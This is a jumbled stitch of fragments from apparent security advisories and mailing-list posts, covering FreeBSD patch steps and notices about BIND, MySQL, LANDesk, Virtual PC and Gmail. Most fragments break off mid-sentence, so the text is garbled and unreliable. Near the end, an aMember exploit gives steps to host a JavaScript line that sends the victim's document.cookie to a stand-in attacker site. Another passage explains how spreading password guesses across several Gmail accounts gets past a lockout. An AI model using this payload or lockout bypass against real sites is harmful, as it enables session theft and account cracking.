3.4.2. Exploits
All the exploits are created using the accompanying Makefiles in the respective
subdirectories. When opened in vim (or ex, view), the exploits create a file
called ``pwned'' in the current directory. To create all the exploits in a
certain subdirectory, run ``make all'' in that subdirectory. See the respective
Makefile sources for details.
mysql-server-5.1 5.1.41-3ubuntu12.7
Ubuntu 10.10:
mysql-server-5.1 5.1.49-1ubuntu8.1
In general, a standard system update will make all the necessary changes.
Details follow:
It was discovered that MySQL incorrectly handled certain requests with the
UPGRADE DATA DIRECTORY NAME command. An authenticated user could exploit
I. Background
BIND 9 is an implementation of the Domain Name System (DNS) protocols.
The named(8) daemon is an Internet Domain Name Server. DNS requests
contain a query id which is used to match a DNS request with the response
and to make it harder for anybody but the DNS server which received the
request to send a valid response.
II. Problem Description
The BIND DNS implementation does not randomize the UDP source port when
I. Background
BIND 9 is an implementation of the Domain Name System (DNS) protocols.
The named(8) daemon is an Internet Domain Name Server. DNS requests
contain a query id which is used to match a DNS request with the response
and to make it harder for anybody but the DNS server which received the
request to send a valid response.
II. Problem Description
When named(8) is operating as a recursive DNS server or sending NOTIFY
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/bind
# make obj && make depend && make && make install
# cd /usr/src/usr.sbin/named
# make obj && make depend && make && make install
# /etc/rc.d/named restart
NOTE WELL: Users running FreeBSD 6 and using DNSSEC are advised to get
VI. Correction details
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssl
# make obj && make depend && make && make install
# cd /usr/src/secure/usr.bin/openssl
# make obj && make depend && make && make install
NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
c) Install and use a fixed version of BIND from the FreeBSD Ports
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssh
# make obj && make depend && make && make install
# cd /usr/src/secure/usr.sbin/sshd
# make obj && make depend && make && make install
# /etc/rc.d/sshd restart
VI. Correction details
urls and requiring an account before posting.
"This web application [OpenClassifieds] is developed to be fast, light, secure and SEO friendly."
Usually when I see that an application claims to be secure, they really don't know what the fuck they
are doing. OpenClassifieds' security model is deeply flawed, and as a result there are MANY
vulnerabilities in this code base, which allowed me to string a few cool ones together to make an
interesting exploit. OpenClassifieds is sanitizing everything on input using cG() and cP(); these
functions are used to perform a mysql_real_escape_string() on all GET and POST variables. Most
servers aren't using an exotic character set, so from a security standpoint this is exactly identical to
magic_quotes_gpc. So I dusted off my usual magic_quotes_gpc auditing tricks: look for
stripslashes(), base64_decode(), urldecode(), html_entity_decode(), and a lack of quote marks around variables
3) To update your vulnerable system via a binary patch:
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/usr.bin/compress
# make obj && make depend && make && make install
# cd /usr/src/usr.bin/gzip
# make obj && make depend && make && make install
3) To update your vulnerable system via a binary patch:
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/bind/
# make obj && make depend && make && make install
# cd /usr/src/usr.sbin/named
# make obj && make depend && make && make install
3) To update your vulnerable system via a binary patch:
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/libtelnet
# make obj && make depend && make && make install
# cd /usr/src/libexec/telnetd
# make obj && make depend && make && make install
3) To update your vulnerable system via a binary patch:
* XHR (XMLHttpRequest) as a vector for mail merging or wordlist attacks in
XPS/IPE attacks
We're going to show you how these two methods combine like Voltron into a whole
much larger than its parts. At the end of this short advisory you will be able
to take any Safari web browser and make it a spam drone, a wordlist-based logon
cracker for networks, or a relay for payloads to arbitrary daemons. You will be
able to do all of this without passing any shellcode or alerting any IDS to
compromise.
Let's cover the bug.
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/libtelnet
# make obj && make depend && make
# cd /usr/src/libexec/telnetd
# make obj && make depend && make && make install
VI. Correction details
Ingres r3 Vulnerability Updates Install Steps (August 1, 2008)
Unix/Linux:
1. Log on to your system using the installation owner account and
make sure the environment is set up correctly:
   1. II_SYSTEM must be set to the Ingres system files
   2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility
      directories.
2. Change directory to the root directory of the Ingres
installation or use a previously created directory.
department).
If your company does not have an incident response team or incident
response procedures, you have to determine how to best notify your
company leadership. Since I do not know your company's social or
political climate, this is a call that you have to make on your own. If
you are not sure how your company will respond to your discovery, you
should consult with an attorney before moving forward. If you found the
vulnerability while performing unauthorized activities, you should
DEFINITELY consult an attorney before doing anything else.
process management solutions to organizations. The company's software
is used worldwide.
A security vulnerability was discovered in LANDesk Management Suite: a
cross-site request forgery which allows an external remote attacker to
perform a command injection that can be used to execute arbitrary code
as the webserver user. As a result, an attacker can remove the
firewall and load a kernel module, allowing root access to the
appliance. It also can be used as a non-persistent XSS.
In order to be able to successfully make the attack, the administrator
> > attackers, because there are a multitude of possible attack vectors,
> > such as SSI, non-suexec CGI scripts, non-suexec PHP (if mod_php is also
> > installed), and likely numerous other options.
>
> Once the attacker can run code as the same user the webserver runs as, he
> can make the webserver do whatever he wants. He can just 'debug' the
> webserver process and change any setting, inject code, whatever. You can
> php.ini whatever you want, and the attacker can just make the webserver
> read his own php.ini, or change the webserver memory after the fact, to
> make it think it read something else than you wrote.
As you comment, when using this feature there is a lock (for 2 hours) on
authentication attempts, and beyond this limit (100 requests) the
message returned by the application does not allow one to know whether the
analyzed password is correct or not. However, every 2 hours an attacker
could make 100 authentication attempts.
To overcome this limit (100 authentication attempts), it is sufficient
that the attacker has other Gmail accounts. Each account allows the
malicious user to make 100 new authentication attempts within 2 hours of
the blockade. If the attacker wants to make an authentication attempt by
many virtual hosts on a single physical system. Windows 7 relies on
Virtual PC technology to implement the backward compatibility XP Mode
for legacy Windows applications. Using XP Mode, Windows 7 users can run
Windows applications on a virtualized Windows XP SP3 operating system
directly from the Windows 7 desktop but in doing so they may be
inadvertently increasing their risk due to a bug that makes standard
Windows anti-exploitation mechanisms ineffective.
A vulnerability found in the memory management of the Virtual Machine
Monitor makes memory pages mapped above the 2GB available with read or
read/write access to user-space programs running in a Guest operating
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssl
# make obj && make depend && make includes && make && make install
NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
compatibility libraries are used, the operating system should instead
be recompiled as described in
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libcrypto
# make obj && make depend && make includes && make && make install
NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
compatibility libraries are used, the operating system should instead
be recompiled as described in
processes with superuser privileges. It is an extension of, but
far more powerful than, the traditional UNIX chroot(2) system call.
By design, neither the chroot(2) nor the jail(2) system call modify
existing open file descriptors of the calling process, in order to
allow programmers to make fine-grained access control and privilege
separation.
The jail(8) utility creates a new jail or modifies an existing jail,
optionally imprisoning the current process (and future descendants)
inside it.
What's the first thing you could do as admin?
http://www.website.tld/amember/admin/backup.php
What's the best way to exploit the vulnerability?
1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters)
2) The file should contain the following:
HTML Code:
document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;
> attackers, because there are a multitude of possible attack vectors,
> such as SSI, non-suexec CGI scripts, non-suexec PHP (if mod_php is also
> installed), and likely numerous other options.
Once the attacker can run code as the same user the webserver runs as, he
can make the webserver do whatever he wants. He can just 'debug' the
webserver process and change any setting, inject code, whatever. You can
php.ini whatever you want, and the attacker can just make the webserver
read his own php.ini, or change the webserver memory after the fact, to
make it think it read something else than you wrote.
> Portfast modifies STP, it does not disable it.
Well, right, the interface configured with it goes straight from
blocking to forwarding. You got the idea.
>
> This does make a good argument for pvst and similar technologies running at the vlan level for enterprise networking.
I don't see the point. Having one instance of STP per vlan or one for
all, there is no point with the security issue here.
>
> But it is probably best to assume someone with access to a segment can see everything on that segment, pretend to be anyone else on that subnet, and inject anything onto that subnet. In other words, it is nearly impossible to protect reliability and somewhat privacy on a shared link.
the WerkzeugH. Its main goal is to help attendees understand the
current state of art in information technology and security, and
showcase projects evolved from the hackerspace movement.
This year's tagline: Make A Good Hack
-------------------------------------
After last year's tagline, 'The Internet is a Series of Tubes',
PlumberCon 10 will take our approach towards security, hacking and